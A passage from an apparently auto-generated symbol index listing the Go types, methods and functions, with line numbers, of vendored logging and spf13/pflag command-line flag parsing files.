*Notepad) SetFlags(flags int) { type LogListener (line 72) | type LogListener function NewNotepad (line 75) | func NewNotepad( type Feedback (line 201) | type Feedback struct method Println (line 206) | func (fb *Feedback) Println(v ...interface{}) { method Printf (line 210) | func (fb *Feedback) Printf(format string, v ...interface{}) { method Print (line 214) | func (fb *Feedback) Print(v ...interface{}) { method output (line 218) | func (fb *Feedback) output(s string) { FILE: vendor/github.com/spf13/pflag/bool.go type boolFlag (line 7) | type boolFlag interface type boolValue (line 13) | type boolValue method Set (line 20) | func (b *boolValue) Set(s string) error { method Type (line 26) | func (b *boolValue) Type() string { method String (line 30) | func (b *boolValue) String() string { return strconv.FormatBool(bool(*... method IsBoolFlag (line 32) | func (b *boolValue) IsBoolFlag() bool { return true } function newBoolValue (line 15) | func newBoolValue(val bool, p *bool) *boolValue { function boolConv (line 34) | func boolConv(sval string) (interface{}, error) { method GetBool (line 39) | func (f *FlagSet) GetBool(name string) (bool, error) { method BoolVar (line 49) | func (f *FlagSet) BoolVar(p *bool, name string, value bool, usage string) { method BoolVarP (line 54) | func (f *FlagSet) BoolVarP(p *bool, name, shorthand string, value bool, ... function BoolVar (line 61) | func BoolVar(p *bool, name string, value bool, usage string) { function BoolVarP (line 66) | func BoolVarP(p *bool, name, shorthand string, value bool, usage string) { method Bool (line 73) | func (f *FlagSet) Bool(name string, value bool, usage string) *bool { method BoolP (line 78) | func (f *FlagSet) BoolP(name, shorthand string, value bool, usage string... function Bool (line 86) | func Bool(name string, value bool, usage string) *bool { function BoolP (line 91) | func BoolP(name, shorthand string, value bool, usage string) *bool { FILE: vendor/github.com/spf13/pflag/bool_slice.go type boolSliceValue (line 10) | type boolSliceValue struct method Set (line 24) | func (s *boolSliceValue) Set(val string) error { method Type (line 57) | func (s *boolSliceValue) Type() string { method String (line 62) | func (s *boolSliceValue) String() string { method fromString (line 74) | func (s *boolSliceValue) fromString(val string) (bool, error) { method toString (line 78) | func (s *boolSliceValue) toString(val bool) string { method Append (line 82) | func (s *boolSliceValue) Append(val string) error { method Replace (line 91) | func (s *boolSliceValue) Replace(val []string) error { method GetSlice (line 104) | func (s *boolSliceValue) GetSlice() []string { function newBoolSliceValue (line 15) | func newBoolSliceValue(val []bool, p *[]bool) *boolSliceValue { function boolSliceConv (line 112) | func boolSliceConv(val string) (interface{}, error) { method GetBoolSlice (line 131) | func (f *FlagSet) GetBoolSlice(name string) ([]bool, error) { method BoolSliceVar (line 141) | func (f *FlagSet) BoolSliceVar(p *[]bool, name string, value []bool, usa... method BoolSliceVarP (line 146) | func (f *FlagSet) BoolSliceVarP(p *[]bool, name, shorthand string, value... function BoolSliceVar (line 152) | func BoolSliceVar(p *[]bool, name string, value []bool, usage string) { function BoolSliceVarP (line 157) | func BoolSliceVarP(p *[]bool, name, shorthand string, value []bool, usag... method BoolSlice (line 163) | func (f *FlagSet) BoolSlice(name string, value []bool, usage string) *[]... method BoolSliceP (line 170) | func (f *FlagSet) BoolSliceP(name, shorthand string, value []bool, usage... function BoolSlice (line 178) | func BoolSlice(name string, value []bool, usage string) *[]bool { function BoolSliceP (line 183) | func BoolSliceP(name, shorthand string, value []bool, usage string) *[]b... FILE: vendor/github.com/spf13/pflag/bytes.go type bytesHexValue (line 11) | type bytesHexValue method String (line 14) | func (bytesHex bytesHexValue) String() string { method Set (line 19) | func (bytesHex *bytesHexValue) Set(value string) error { method Type (line 32) | func (*bytesHexValue) Type() string { function newBytesHexValue (line 36) | func newBytesHexValue(val []byte, p *[]byte) *bytesHexValue { function bytesHexConv (line 41) | func bytesHexConv(sval string) (interface{}, error) { method GetBytesHex (line 53) | func (f *FlagSet) GetBytesHex(name string) ([]byte, error) { method BytesHexVar (line 65) | func (f *FlagSet) BytesHexVar(p *[]byte, name string, value []byte, usag... method BytesHexVarP (line 70) | func (f *FlagSet) BytesHexVarP(p *[]byte, name, shorthand string, value ... function BytesHexVar (line 76) | func BytesHexVar(p *[]byte, name string, value []byte, usage string) { function BytesHexVarP (line 81) | func BytesHexVarP(p *[]byte, name, shorthand string, value []byte, usage... method BytesHex (line 87) | func (f *FlagSet) BytesHex(name string, value []byte, usage string) *[]b... method BytesHexP (line 94) | func (f *FlagSet) BytesHexP(name, shorthand string, value []byte, usage ... function BytesHex (line 102) | func BytesHex(name string, value []byte, usage string) *[]byte { function BytesHexP (line 107) | func BytesHexP(name, shorthand string, value []byte, usage string) *[]by... type bytesBase64Value (line 112) | type bytesBase64Value method String (line 115) | func (bytesBase64 bytesBase64Value) String() string { method Set (line 120) | func (bytesBase64 *bytesBase64Value) Set(value string) error { method Type (line 133) | func (*bytesBase64Value) Type() string { function newBytesBase64Value (line 137) | func newBytesBase64Value(val []byte, p *[]byte) *bytesBase64Value { function bytesBase64ValueConv (line 142) | func bytesBase64ValueConv(sval string) (interface{}, error) { method GetBytesBase64 (line 153) | func (f *FlagSet) GetBytesBase64(name string) ([]byte, error) { method BytesBase64Var (line 165) | func (f *FlagSet) BytesBase64Var(p *[]byte, name string, value []byte, u... method BytesBase64VarP (line 170) | func (f *FlagSet) BytesBase64VarP(p *[]byte, name, shorthand string, val... function BytesBase64Var (line 176) | func BytesBase64Var(p *[]byte, name string, value []byte, usage string) { function BytesBase64VarP (line 181) | func BytesBase64VarP(p *[]byte, name, shorthand string, value []byte, us... method BytesBase64 (line 187) | func (f *FlagSet) BytesBase64(name string, value []byte, usage string) *... method BytesBase64P (line 194) | func (f *FlagSet) BytesBase64P(name, shorthand string, value []byte, usa... function BytesBase64 (line 202) | func BytesBase64(name string, value []byte, usage string) *[]byte { function BytesBase64P (line 207) | func BytesBase64P(name, shorthand string, value []byte, usage string) *[... FILE: vendor/github.com/spf13/pflag/count.go type countValue (line 6) | type countValue method Set (line 13) | func (i *countValue) Set(s string) error { method Type (line 24) | func (i *countValue) Type() string { method String (line 28) | func (i *countValue) String() string { return strconv.Itoa(int(*i)) } function newCountValue (line 8) | func newCountValue(val int, p *int) *countValue { function countConv (line 30) | func countConv(sval string) (interface{}, error) { method GetCount (line 39) | func (f *FlagSet) GetCount(name string) (int, error) { method CountVar (line 50) | func (f *FlagSet) CountVar(p *int, name string, usage string) { method CountVarP (line 55) | func (f *FlagSet) CountVarP(p *int, name, shorthand string, usage string) { function CountVar (line 61) | func CountVar(p *int, name string, usage string) { function CountVarP (line 66) | func CountVarP(p *int, name, shorthand string, usage string) { method Count (line 73) | func (f *FlagSet) Count(name string, usage string) *int { method CountP (line 80) | func (f *FlagSet) CountP(name, shorthand string, usage string) *int { function Count (line 89) | func Count(name string, usage string) *int { function CountP (line 94) | func CountP(name, shorthand string, usage string) *int { FILE: vendor/github.com/spf13/pflag/duration.go type durationValue (line 8) | type durationValue method Set (line 15) | func (d *durationValue) Set(s string) error { method Type (line 21) | func (d *durationValue) Type() string { method String (line 25) | func (d *durationValue) String() string { return (*time.Duration)(d).S... function newDurationValue (line 10) | func newDurationValue(val time.Duration, p *time.Duration) *durationValue { function durationConv (line 27) | func durationConv(sval string) (interface{}, error) { method GetDuration (line 32) | func (f *FlagSet) GetDuration(name string) (time.Duration, error) { method DurationVar (line 42) | func (f *FlagSet) DurationVar(p *time.Duration, name string, value time.... method DurationVarP (line 47) | func (f *FlagSet) DurationVarP(p *time.Duration, name, shorthand string,... function DurationVar (line 53) | func DurationVar(p *time.Duration, name string, value time.Duration, usa... function DurationVarP (line 58) | func DurationVarP(p *time.Duration, name, shorthand string, value time.D... method Duration (line 64) | func (f *FlagSet) Duration(name string, value time.Duration, usage strin... method DurationP (line 71) | func (f *FlagSet) DurationP(name, shorthand string, value time.Duration,... function Duration (line 79) | func Duration(name string, value time.Duration, usage string) *time.Dura... function DurationP (line 84) | func DurationP(name, shorthand string, value time.Duration, usage string... FILE: vendor/github.com/spf13/pflag/duration_slice.go type durationSliceValue (line 10) | type durationSliceValue struct method Set (line 22) | func (s *durationSliceValue) Set(val string) error { method Type (line 42) | func (s *durationSliceValue) Type() string { method String (line 46) | func (s *durationSliceValue) String() string { method fromString (line 54) | func (s *durationSliceValue) fromString(val string) (time.Duration, er... method toString (line 58) | func (s *durationSliceValue) toString(val time.Duration) string { method Append (line 62) | func (s *durationSliceValue) Append(val string) error { method Replace (line 71) | func (s *durationSliceValue) Replace(val []string) error { method GetSlice (line 84) | func (s *durationSliceValue) GetSlice() []string { function newDurationSliceValue (line 15) | func newDurationSliceValue(val []time.Duration, p *[]time.Duration) *dur... function durationSliceConv (line 92) | func durationSliceConv(val string) (interface{}, error) { method GetDurationSlice (line 112) | func (f *FlagSet) GetDurationSlice(name string) ([]time.Duration, error) { method DurationSliceVar (line 122) | func (f *FlagSet) DurationSliceVar(p *[]time.Duration, name string, valu... method DurationSliceVarP (line 127) | func (f *FlagSet) DurationSliceVarP(p *[]time.Duration, name, shorthand ... function DurationSliceVar (line 133) | func DurationSliceVar(p *[]time.Duration, name string, value []time.Dura... function DurationSliceVarP (line 138) | func DurationSliceVarP(p *[]time.Duration, name, shorthand string, value... method DurationSlice (line 144) | func (f *FlagSet) DurationSlice(name string, value []time.Duration, usag... method DurationSliceP (line 151) | func (f *FlagSet) DurationSliceP(name, shorthand string, value []time.Du... function DurationSlice (line 159) | func DurationSlice(name string, value []time.Duration, usage string) *[]... function DurationSliceP (line 164) | func DurationSliceP(name, shorthand string, value []time.Duration, usage... FILE: vendor/github.com/spf13/pflag/flag.go type ErrorHandling (line 116) | type ErrorHandling constant ContinueOnError (line 120) | ContinueOnError ErrorHandling = iota constant ExitOnError (line 122) | ExitOnError constant PanicOnError (line 124) | PanicOnError type ParseErrorsWhitelist (line 128) | type ParseErrorsWhitelist struct type NormalizedName (line 135) | type NormalizedName type FlagSet (line 138) | type FlagSet struct method SetNormalizeFunc (line 226) | func (f *FlagSet) SetNormalizeFunc(n func(f *FlagSet, name string) Nor... method GetNormalizeFunc (line 246) | func (f *FlagSet) GetNormalizeFunc() func(f *FlagSet, name string) Nor... method normalizeFlagName (line 253) | func (f *FlagSet) normalizeFlagName(name string) NormalizedName { method out (line 258) | func (f *FlagSet) out() io.Writer { method SetOutput (line 267) | func (f *FlagSet) SetOutput(output io.Writer) { method VisitAll (line 274) | func (f *FlagSet) VisitAll(fn func(*Flag)) { method HasFlags (line 295) | func (f *FlagSet) HasFlags() bool { method HasAvailableFlags (line 301) | func (f *FlagSet) HasAvailableFlags() bool { method Visit (line 320) | func (f *FlagSet) Visit(fn func(*Flag)) { method Lookup (line 348) | func (f *FlagSet) Lookup(name string) *Flag { method ShorthandLookup (line 355) | func (f *FlagSet) ShorthandLookup(name string) *Flag { method lookup (line 369) | func (f *FlagSet) lookup(name NormalizedName) *Flag { method getFlagType (line 374) | func (f *FlagSet) getFlagType(name string, ftype string, convFunc func... method ArgsLenAtDash (line 397) | func (f *FlagSet) ArgsLenAtDash() int { method MarkDeprecated (line 404) | func (f *FlagSet) MarkDeprecated(name string, usageMessage string) err... method MarkShorthandDeprecated (line 420) | func (f *FlagSet) MarkShorthandDeprecated(name string, usageMessage st... method MarkHidden (line 434) | func (f *FlagSet) MarkHidden(name string) error { method Set (line 456) | func (f *FlagSet) Set(name, value string) error { method SetAnnotation (line 493) | func (f *FlagSet) SetAnnotation(name, key string, values []string) err... method Changed (line 508) | func (f *FlagSet) Changed(name string) bool { method PrintDefaults (line 524) | func (f *FlagSet) PrintDefaults() { method FlagUsagesWrapped (line 677) | func (f *FlagSet) FlagUsagesWrapped(cols int) string { method FlagUsages (line 750) | func (f *FlagSet) FlagUsages() string { method NFlag (line 779) | func (f *FlagSet) NFlag() int { return len(f.actual) } method Arg (line 786) | func (f *FlagSet) Arg(i int) string { method NArg (line 800) | func (f *FlagSet) NArg() int { return len(f.args) } method Args (line 806) | func (f *FlagSet) Args() []string { return f.args } method Var (line 817) | func (f *FlagSet) Var(value Value, name string, usage string) { method VarPF (line 822) | func (f *FlagSet) VarPF(value Value, name, shorthand, usage string) *F... method VarP (line 836) | func (f *FlagSet) VarP(value Value, name, shorthand, usage string) { method AddFlag (line 841) | func (f *FlagSet) AddFlag(flag *Flag) { method AddFlagSet (line 881) | func (f *FlagSet) AddFlagSet(newSet *FlagSet) { method failf (line 909) | func (f *FlagSet) failf(format string, a ...interface{}) error { method usage (line 920) | func (f *FlagSet) usage() { method parseLongArg (line 952) | func (f *FlagSet) parseLongArg(s string, args []string, fn parseFunc) ... method parseSingleShortArg (line 1007) | func (f *FlagSet) parseSingleShortArg(shorthands string, args []string... method parseShortArg (line 1073) | func (f *FlagSet) parseShortArg(s string, args []string, fn parseFunc)... method parseArgs (line 1088) | func (f *FlagSet) parseArgs(args []string, fn parseFunc) (err error) { method Parse (line 1123) | func (f *FlagSet) Parse(arguments []string) error { method ParseAll (line 1163) | func (f *FlagSet) ParseAll(arguments []string, fn func(flag *Flag, val... method Parsed (line 1182) | func (f *FlagSet) Parsed() bool { method SetInterspersed (line 1228) | func (f *FlagSet) SetInterspersed(interspersed bool) { method Init (line 1235) | func (f *FlagSet) Init(name string, errorHandling ErrorHandling) { type Flag (line 171) | type Flag struct method defaultIsZeroValue (line 531) | func (f *Flag) defaultIsZeroValue() bool { type Value (line 187) | type Value interface type SliceValue (line 196) | type SliceValue interface function sortFlags (line 206) | func sortFlags(flags map[NormalizedName]*Flag) []*Flag { function VisitAll (line 313) | func VisitAll(fn func(*Flag)) { function Visit (line 343) | func Visit(fn func(*Flag)) { function Lookup (line 445) | func Lookup(name string) *Flag { function ShorthandLookup (line 451) | func ShorthandLookup(name string) *Flag { function Set (line 518) | func Set(name, value string) error { function UnquoteUsage (line 566) | func UnquoteUsage(flag *Flag) (name string, usage string) { function wrapN (line 609) | func wrapN(i, slop int, s string) (string, string) { function wrap (line 628) | func wrap(i, w int, s string) string { function PrintDefaults (line 755) | func PrintDefaults() { function defaultUsage (line 760) | func defaultUsage(f *FlagSet) { function NFlag (line 782) | func NFlag() int { return len(CommandLine.actual) } function Arg (line 795) | func Arg(i int) string { function NArg (line 803) | func NArg() int { return len(CommandLine.args) } function Args (line 809) | func Args() []string { return CommandLine.args } function Var (line 898) | func Var(value Value, name string, usage string) { function VarP (line 903) | func VarP(value Value, name, shorthand, usage string) { function stripUnknownFlagValue (line 933) | func stripUnknownFlagValue(args []string) []string { type parseFunc (line 1156) | type parseFunc function Parse (line 1188) | func Parse() { function ParseAll (line 1196) | func ParseAll(fn func(flag *Flag, value string) error) { function SetInterspersed (line 1202) | func SetInterspersed(interspersed bool) { function Parsed (line 1207) | func Parsed() bool { function NewFlagSet (line 1216) | func NewFlagSet(name string, errorHandling ErrorHandling) *FlagSet { FILE: vendor/github.com/spf13/pflag/float32.go type float32Value (line 6) | type float32Value method Set (line 13) | func (f *float32Value) Set(s string) error { method Type (line 19) | func (f *float32Value) Type() string { method String (line 23) | func (f *float32Value) String() string { return strconv.FormatFloat(fl... function newFloat32Value (line 8) | func newFloat32Value(val float32, p *float32) *float32Value { function float32Conv (line 25) | func float32Conv(sval string) (interface{}, error) { method GetFloat32 (line 34) | func (f *FlagSet) GetFloat32(name string) (float32, error) { method Float32Var (line 44) | func (f *FlagSet) Float32Var(p *float32, name string, value float32, usa... method Float32VarP (line 49) | func (f *FlagSet) Float32VarP(p *float32, name, shorthand string, value ... function Float32Var (line 55) | func Float32Var(p *float32, name string, value float32, usage string) { function Float32VarP (line 60) | func Float32VarP(p *float32, name, shorthand string, value float32, usag... method Float32 (line 66) | func (f *FlagSet) Float32(name string, value float32, usage string) *flo... method Float32P (line 73) | func (f *FlagSet) Float32P(name, shorthand string, value float32, usage ... function Float32 (line 81) | func Float32(name string, value float32, usage string) *float32 { function Float32P (line 86) | func Float32P(name, shorthand string, value float32, usage string) *floa... FILE: vendor/github.com/spf13/pflag/float32_slice.go type float32SliceValue (line 10) | type float32SliceValue struct method Set (line 22) | func (s *float32SliceValue) Set(val string) error { method Type (line 44) | func (s *float32SliceValue) Type() string { method String (line 48) | func (s *float32SliceValue) String() string { method fromString (line 56) | func (s *float32SliceValue) fromString(val string) (float32, error) { method toString (line 64) | func (s *float32SliceValue) toString(val float32) string { method Append (line 68) | func (s *float32SliceValue) Append(val string) error { method Replace (line 77) | func (s *float32SliceValue) Replace(val []string) error { method GetSlice (line 90) | func (s *float32SliceValue) GetSlice() []string { function newFloat32SliceValue (line 15) | func newFloat32SliceValue(val []float32, p *[]float32) *float32SliceValue { function float32SliceConv (line 98) | func float32SliceConv(val string) (interface{}, error) { method GetFloat32Slice (line 120) | func (f *FlagSet) GetFloat32Slice(name string) ([]float32, error) { method Float32SliceVar (line 130) | func (f *FlagSet) Float32SliceVar(p *[]float32, name string, value []flo... method Float32SliceVarP (line 135) | func (f *FlagSet) Float32SliceVarP(p *[]float32, name, shorthand string,... function Float32SliceVar (line 141) | func Float32SliceVar(p *[]float32, name string, value []float32, usage s... function Float32SliceVarP (line 146) | func Float32SliceVarP(p *[]float32, name, shorthand string, value []floa... method Float32Slice (line 152) | func (f *FlagSet) Float32Slice(name string, value []float32, usage strin... method Float32SliceP (line 159) | func (f *FlagSet) Float32SliceP(name, shorthand string, value []float32,... function Float32Slice (line 167) | func Float32Slice(name string, value []float32, usage string) *[]float32 { function Float32SliceP (line 172) | func Float32SliceP(name, shorthand string, value []float32, usage string... FILE: vendor/github.com/spf13/pflag/float64.go type float64Value (line 6) | type float64Value method Set (line 13) | func (f *float64Value) Set(s string) error { method Type (line 19) | func (f *float64Value) Type() string { method String (line 23) | func (f *float64Value) String() string { return strconv.FormatFloat(fl... function newFloat64Value (line 8) | func newFloat64Value(val float64, p *float64) *float64Value { function float64Conv (line 25) | func float64Conv(sval string) (interface{}, error) { method GetFloat64 (line 30) | func (f *FlagSet) GetFloat64(name string) (float64, error) { method Float64Var (line 40) | func (f *FlagSet) Float64Var(p *float64, name string, value float64, usa... method Float64VarP (line 45) | func (f *FlagSet) Float64VarP(p *float64, name, shorthand string, value ... function Float64Var (line 51) | func Float64Var(p *float64, name string, value float64, usage string) { function Float64VarP (line 56) | func Float64VarP(p *float64, name, shorthand string, value float64, usag... method Float64 (line 62) | func (f *FlagSet) Float64(name string, value float64, usage string) *flo... method Float64P (line 69) | func (f *FlagSet) Float64P(name, shorthand string, value float64, usage ... function Float64 (line 77) | func Float64(name string, value float64, usage string) *float64 { function Float64P (line 82) | func Float64P(name, shorthand string, value float64, usage string) *floa... FILE: vendor/github.com/spf13/pflag/float64_slice.go type float64SliceValue (line 10) | type float64SliceValue struct method Set (line 22) | func (s *float64SliceValue) Set(val string) error { method Type (line 42) | func (s *float64SliceValue) Type() string { method String (line 46) | func (s *float64SliceValue) String() string { method fromString (line 54) | func (s *float64SliceValue) fromString(val string) (float64, error) { method toString (line 58) | func (s *float64SliceValue) toString(val float64) string { method Append (line 62) | func (s *float64SliceValue) Append(val string) error { method Replace (line 71) | func (s *float64SliceValue) Replace(val []string) error { method GetSlice (line 84) | func (s *float64SliceValue) GetSlice() []string { function newFloat64SliceValue (line 15) | func newFloat64SliceValue(val []float64, p *[]float64) *float64SliceValue { function float64SliceConv (line 92) | func float64SliceConv(val string) (interface{}, error) { method GetFloat64Slice (line 112) | func (f *FlagSet) GetFloat64Slice(name string) ([]float64, error) { method Float64SliceVar (line 122) | func (f *FlagSet) Float64SliceVar(p *[]float64, name string, value []flo... method Float64SliceVarP (line 127) | func (f *FlagSet) Float64SliceVarP(p *[]float64, name, shorthand string,... function Float64SliceVar (line 133) | func Float64SliceVar(p *[]float64, name string, value []float64, usage s... function Float64SliceVarP (line 138) | func Float64SliceVarP(p *[]float64, name, shorthand string, value []floa... method Float64Slice (line 144) | func (f *FlagSet) Float64Slice(name string, value []float64, usage strin... method Float64SliceP (line 151) | func (f *FlagSet) Float64SliceP(name, shorthand string, value []float64,... function Float64Slice (line 159) | func Float64Slice(name string, value []float64, usage string) *[]float64 { function Float64SliceP (line 164) | func Float64SliceP(name, shorthand string, value []float64, usage string... FILE: vendor/github.com/spf13/pflag/golangflag.go type flagValueWrapper (line 17) | type flagValueWrapper struct method String (line 48) | func (v *flagValueWrapper) String() string { method Set (line 52) | func (v *flagValueWrapper) Set(s string) error { method Type (line 56) | func (v *flagValueWrapper) Type() string { type goBoolFlag (line 24) | type goBoolFlag interface function wrapFlagValue (line 29) | func wrapFlagValue(v goflag.Value) Value { function PFlagFromGoFlag (line 64) | func PFlagFromGoFlag(goflag *goflag.Flag) *Flag { method AddGoFlag (line 85) | func (f *FlagSet) AddGoFlag(goflag *goflag.Flag) { method AddGoFlagSet (line 94) | func (f *FlagSet) AddGoFlagSet(newSet *goflag.FlagSet) { FILE: vendor/github.com/spf13/pflag/int.go type intValue (line 6) | type intValue method Set (line 13) | func (i *intValue) Set(s string) error { method Type (line 19) | func (i *intValue) Type() string { method String (line 23) | func (i *intValue) String() string { return strconv.Itoa(int(*i)) } function newIntValue (line 8) | func newIntValue(val int, p *int) *intValue { function intConv (line 25) | func intConv(sval string) (interface{}, error) { method GetInt (line 30) | func (f *FlagSet) GetInt(name string) (int, error) { method IntVar (line 40) | func (f *FlagSet) IntVar(p *int, name string, value int, usage string) { method IntVarP (line 45) | func (f *FlagSet) IntVarP(p *int, name, shorthand string, value int, usa... function IntVar (line 51) | func IntVar(p *int, name string, value int, usage string) { function IntVarP (line 56) | func IntVarP(p *int, name, shorthand string, value int, usage string) { method Int (line 62) | func (f *FlagSet) Int(name string, value int, usage string) *int { method IntP (line 69) | func (f *FlagSet) IntP(name, shorthand string, value int, usage string) ... function Int (line 77) | func Int(name string, value int, usage string) *int { function IntP (line 82) | func IntP(name, shorthand string, value int, usage string) *int { FILE: vendor/github.com/spf13/pflag/int16.go type int16Value (line 6) | type int16Value method Set (line 13) | func (i *int16Value) Set(s string) error { method Type (line 19) | func (i *int16Value) Type() string { method String (line 23) | func (i *int16Value) String() string { return strconv.FormatInt(int64(... function newInt16Value (line 8) | func newInt16Value(val int16, p *int16) *int16Value { function int16Conv (line 25) | func int16Conv(sval string) (interface{}, error) { method GetInt16 (line 34) | func (f *FlagSet) GetInt16(name string) (int16, error) { method Int16Var (line 44) | func (f *FlagSet) Int16Var(p *int16, name string, value int16, usage str... method Int16VarP (line 49) | func (f *FlagSet) Int16VarP(p *int16, name, shorthand string, value int1... function Int16Var (line 55) | func Int16Var(p *int16, name string, value int16, usage string) { function Int16VarP (line 60) | func Int16VarP(p *int16, name, shorthand string, value int16, usage stri... method Int16 (line 66) | func (f *FlagSet) Int16(name string, value int16, usage string) *int16 { method Int16P (line 73) | func (f *FlagSet) Int16P(name, shorthand string, value int16, usage stri... function Int16 (line 81) | func Int16(name string, value int16, usage string) *int16 { function Int16P (line 86) | func Int16P(name, shorthand string, value int16, usage string) *int16 { FILE: vendor/github.com/spf13/pflag/int32.go type int32Value (line 6) | type int32Value method Set (line 13) | func (i *int32Value) Set(s string) error { method Type (line 19) | func (i *int32Value) Type() string { method String (line 23) | func (i *int32Value) String() string { return strconv.FormatInt(int64(... function newInt32Value (line 8) | func newInt32Value(val int32, p *int32) *int32Value { function int32Conv (line 25) | func int32Conv(sval string) (interface{}, error) { method GetInt32 (line 34) | func (f *FlagSet) GetInt32(name string) (int32, error) { method Int32Var (line 44) | func (f *FlagSet) Int32Var(p *int32, name string, value int32, usage str... method Int32VarP (line 49) | func (f *FlagSet) Int32VarP(p *int32, name, shorthand string, value int3... function Int32Var (line 55) | func Int32Var(p *int32, name string, value int32, usage string) { function Int32VarP (line 60) | func Int32VarP(p *int32, name, shorthand string, value int32, usage stri... method Int32 (line 66) | func (f *FlagSet) Int32(name string, value int32, usage string) *int32 { method Int32P (line 73) | func (f *FlagSet) Int32P(name, shorthand string, value int32, usage stri... function Int32 (line 81) | func Int32(name string, value int32, usage string) *int32 { function Int32P (line 86) | func Int32P(name, shorthand string, value int32, usage string) *int32 { FILE: vendor/github.com/spf13/pflag/int32_slice.go type int32SliceValue (line 10) | type int32SliceValue struct method Set (line 22) | func (s *int32SliceValue) Set(val string) error { method Type (line 44) | func (s *int32SliceValue) Type() string { method String (line 48) | func (s *int32SliceValue) String() string { method fromString (line 56) | func (s *int32SliceValue) fromString(val string) (int32, error) { method toString (line 64) | func (s *int32SliceValue) toString(val int32) string { method Append (line 68) | func (s *int32SliceValue) Append(val string) error { method Replace (line 77) | func (s *int32SliceValue) Replace(val []string) error { method GetSlice (line 90) | func (s *int32SliceValue) GetSlice() []string { function newInt32SliceValue (line 15) | func newInt32SliceValue(val []int32, p *[]int32) *int32SliceValue { function int32SliceConv (line 98) | func int32SliceConv(val string) (interface{}, error) { method GetInt32Slice (line 120) | func (f *FlagSet) GetInt32Slice(name string) ([]int32, error) { method Int32SliceVar (line 130) | func (f *FlagSet) Int32SliceVar(p *[]int32, name string, value []int32, ... method Int32SliceVarP (line 135) | func (f *FlagSet) Int32SliceVarP(p *[]int32, name, shorthand string, val... function Int32SliceVar (line 141) | func Int32SliceVar(p *[]int32, name string, value []int32, usage string) { function Int32SliceVarP (line 146) | func Int32SliceVarP(p *[]int32, name, shorthand string, value []int32, u... method Int32Slice (line 152) | func (f *FlagSet) Int32Slice(name string, value []int32, usage string) *... method Int32SliceP (line 159) | func (f *FlagSet) Int32SliceP(name, shorthand string, value []int32, usa... function Int32Slice (line 167) | func Int32Slice(name string, value []int32, usage string) *[]int32 { function Int32SliceP (line 172) | func Int32SliceP(name, shorthand string, value []int32, usage string) *[... FILE: vendor/github.com/spf13/pflag/int64.go type int64Value (line 6) | type int64Value method Set (line 13) | func (i *int64Value) Set(s string) error { method Type (line 19) | func (i *int64Value) Type() string { method String (line 23) | func (i *int64Value) String() string { return strconv.FormatInt(int64(... function newInt64Value (line 8) | func newInt64Value(val int64, p *int64) *int64Value { function int64Conv (line 25) | func int64Conv(sval string) (interface{}, error) { method GetInt64 (line 30) | func (f *FlagSet) GetInt64(name string) (int64, error) { method Int64Var (line 40) | func (f *FlagSet) Int64Var(p *int64, name string, value int64, usage str... method Int64VarP (line 45) | func (f *FlagSet) Int64VarP(p *int64, name, shorthand string, value int6... function Int64Var (line 51) | func Int64Var(p *int64, name string, value int64, usage string) { function Int64VarP (line 56) | func Int64VarP(p *int64, name, shorthand string, value int64, usage stri... method Int64 (line 62) | func (f *FlagSet) Int64(name string, value int64, usage string) *int64 { method Int64P (line 69) | func (f *FlagSet) Int64P(name, shorthand string, value int64, usage stri... function Int64 (line 77) | func Int64(name string, value int64, usage string) *int64 { function Int64P (line 82) | func Int64P(name, shorthand string, value int64, usage string) *int64 { FILE: vendor/github.com/spf13/pflag/int64_slice.go type int64SliceValue (line 10) | type int64SliceValue struct method Set (line 22) | func (s *int64SliceValue) Set(val string) error { method Type (line 42) | func (s *int64SliceValue) Type() string { method String (line 46) | func (s *int64SliceValue) String() string { method fromString (line 54) | func (s *int64SliceValue) fromString(val string) (int64, error) { method toString (line 58) | func (s *int64SliceValue) toString(val int64) string { method Append (line 62) | func (s *int64SliceValue) Append(val string) error { method Replace (line 71) | func (s *int64SliceValue) Replace(val []string) error { method GetSlice (line 84) | func (s *int64SliceValue) GetSlice() []string { function newInt64SliceValue (line 15) | func newInt64SliceValue(val []int64, p *[]int64) *int64SliceValue { function int64SliceConv (line 92) | func int64SliceConv(val string) (interface{}, error) { method GetInt64Slice (line 112) | func (f *FlagSet) GetInt64Slice(name string) ([]int64, error) { method Int64SliceVar (line 122) | func (f *FlagSet) Int64SliceVar(p *[]int64, name string, value []int64, ... method Int64SliceVarP (line 127) | func (f *FlagSet) Int64SliceVarP(p *[]int64, name, shorthand string, val... function Int64SliceVar (line 133) | func Int64SliceVar(p *[]int64, name string, value []int64, usage string) { function Int64SliceVarP (line 138) | func Int64SliceVarP(p *[]int64, name, shorthand string, value []int64, u... method Int64Slice (line 144) | func (f *FlagSet) Int64Slice(name string, value []int64, usage string) *... method Int64SliceP (line 151) | func (f *FlagSet) Int64SliceP(name, shorthand string, value []int64, usa... function Int64Slice (line 159) | func Int64Slice(name string, value []int64, usage string) *[]int64 { function Int64SliceP (line 164) | func Int64SliceP(name, shorthand string, value []int64, usage string) *[... FILE: vendor/github.com/spf13/pflag/int8.go type int8Value (line 6) | type int8Value method Set (line 13) | func (i *int8Value) Set(s string) error { method Type (line 19) | func (i *int8Value) Type() string { method String (line 23) | func (i *int8Value) String() string { return strconv.FormatInt(int64(*... function newInt8Value (line 8) | func newInt8Value(val int8, p *int8) *int8Value { function int8Conv (line 25) | func int8Conv(sval string) (interface{}, error) { method GetInt8 (line 34) | func (f *FlagSet) GetInt8(name string) (int8, error) { method Int8Var (line 44) | func (f *FlagSet) Int8Var(p *int8, name string, value int8, usage string) { method Int8VarP (line 49) | func (f *FlagSet) Int8VarP(p *int8, name, shorthand string, value int8, ... function Int8Var (line 55) | func Int8Var(p *int8, name string, value int8, usage string) { function Int8VarP (line 60) | func Int8VarP(p *int8, name, shorthand string, value int8, usage string) { method Int8 (line 66) | func (f *FlagSet) Int8(name string, value int8, usage string) *int8 { method Int8P (line 73) | func (f *FlagSet) Int8P(name, shorthand string, value int8, usage string... function Int8 (line 81) | func Int8(name string, value int8, usage string) *int8 { function Int8P (line 86) | func Int8P(name, shorthand string, value int8, usage string) *int8 { FILE: vendor/github.com/spf13/pflag/int_slice.go type intSliceValue (line 10) | type intSliceValue struct method Set (line 22) | func (s *intSliceValue) Set(val string) error { method Type (line 42) | func (s *intSliceValue) Type() string { method String (line 46) | func (s *intSliceValue) String() string { method Append (line 54) | func (s *intSliceValue) Append(val string) error { method Replace (line 63) | func (s *intSliceValue) Replace(val []string) error { method GetSlice (line 76) | func (s *intSliceValue) GetSlice() []string { function newIntSliceValue (line 15) | func newIntSliceValue(val []int, p *[]int) *intSliceValue { function intSliceConv (line 84) | func intSliceConv(val string) (interface{}, error) { method GetIntSlice (line 104) | func (f *FlagSet) 